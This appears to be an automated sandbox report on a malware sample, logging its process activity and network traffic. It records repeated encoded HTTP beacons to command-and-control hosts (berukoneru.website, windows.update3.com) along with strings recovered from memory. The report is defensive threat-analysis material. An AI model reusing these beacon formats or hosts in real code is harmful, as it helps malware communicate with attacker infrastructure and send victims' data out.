          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: global trafficHTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655671376.0000000003335000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471079940.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.674023978.0000000003336000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.654359694.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655489490.000000000332C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.654149765.00000164EB229000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.667097557.00000164EB22A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: powershell.exe, 00000018.00000003.653604031.00000164EB3D9000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.555671260.00000164EB3D4000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoftq
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mic
          Source: powershell.exe, 00000018.00000002.669107613.00000164D2D91000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.651339407.000002DABC551000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
          Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/MicrosoftEdgeDownload&quot;
          Source: regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/
          Source: regsvr32.exe, 00000003.00000003.520125804.000000000330C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527683209.0000000003310000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf
          Source: regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uq
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax&quot;
          Source: loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xvsU?ver=e636&quot;
          Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/P
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/i
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lom
          Source: unknownDNS traffic detected: queries for: windows.update3.com
          Source: global trafficHTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
